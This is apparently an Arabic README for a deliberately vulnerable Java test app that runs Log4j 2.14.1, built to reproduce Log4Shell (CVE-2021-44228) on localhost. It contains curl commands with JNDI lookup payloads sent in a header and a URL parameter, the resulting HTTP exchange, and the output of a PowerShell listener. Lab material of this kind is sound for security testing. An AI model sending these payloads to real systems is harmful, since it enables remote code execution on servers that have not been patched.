
هذا تطبيق ويب جافا يحتمل أن يكون ضعيفًا يحتوي على Log4j المتأثر بـ log4shell (CVE-2021-44228).
هذا تطبيق ويب Java يحتمل أن يكون ضعيفًا ويحتوي على Log4j (2.14.1) المتأثر بـ log4shell (CVE-2021-44228).
java --version للتحقق من أن AdoptOpenJDK يعمل بشكل صحيح.[ملاحظة]
إذا كنت ترغب في تغيير إصدار JDK أو منفذ tomcat إلخ، قم بتعديل build.gradle.
نفذ مُغلِّف Gradle مع build.gradle.
# على Linux
./gradlew appRun
# على Windows
.\gradlew.bat appRun
الرابط الرئيسي:
http://localhost:8080/l4s-vulnapp/
[ملاحظة]
يتم تفعيل Log4Shell فقط عندما يقوم التطبيق بتسجيل بعض السجلات باستخدام Log4j.
على سبيل المثال، إذا تم الوصول إلى الرابط التالي، سيتم تنفيذ Log4Shell.
http://localhost:8080/l4s-vulnapp/servlet
يمكنك التحقق من Log4Shell عن طريق التلاعب بقيمة "x-param" أو إضافة رأس "x-log" إلى طلب HTTP عند الوصول إليه.
سيتم تسجيل هذه المعاملات بواسطة Log4j.
ومع ذلك، هذا فقط إذا كان هناك خادم استماع يعمل على localhost:8081.
curl http://localhost:8080/l4s-vulnapp/servlet -H 'x-log: ${jndi:rmi://localhost:8081/test.txt}'
curl -X GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D
طلب HTTP
GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/l4s-vulnapp/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: ja,en-US;q=0.9,en;q=0.8
استجابة HTTP
HTTP/1.1 200
Content-Type: text/plain;charset=utf-8
Content-Length: 62
Date: Fri, 15 Mar 2024 18:42:56 GMT
Keep-Alive: timeout=60
Connection: keep-alive
Hello
Logging to console using vulnerable Log4j2 by parameter
طلب RMI من l4s-vulnapp
2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
2024/03/16 03:42:55: [Hex data] ===== start =====
2024/03/16 03:42:56: 00000000 4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00 JRMI..K.........
2024/03/16 03:42:56: 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2024/03/16 03:42:56: [Hex data] ===== end =====
2024/03/16 03:42:56: [Raw data] ===== start =====
2024/03/16 03:42:56: JRMI
2024/03/16 03:42:56: [Raw data] ===== end =====
يبدأ l4s-ls.ps1 خادم استماع، قم بتشغيل هذا السكريبت في Windows PowerShell/Command Prompt.
يستقبل هذا الخادم الاتصالات الثنائية مثل LDAP و RMI، ويمكنه عرض محتويات هذه الاتصالات بصيغة Hex و Raw.
إذا تعطل السكريبت، استخدم Ctrl + C لإيقافه.
[تحذير]
عند تشغيل هذا السكريبت لأول مرة، من الضروري تحديد "شبكة خاصة" في نافذة Windows المنبثقة.
PowerShell -ExecutionPolicy RemoteSigned .\l4s-ls.ps1 -p 8081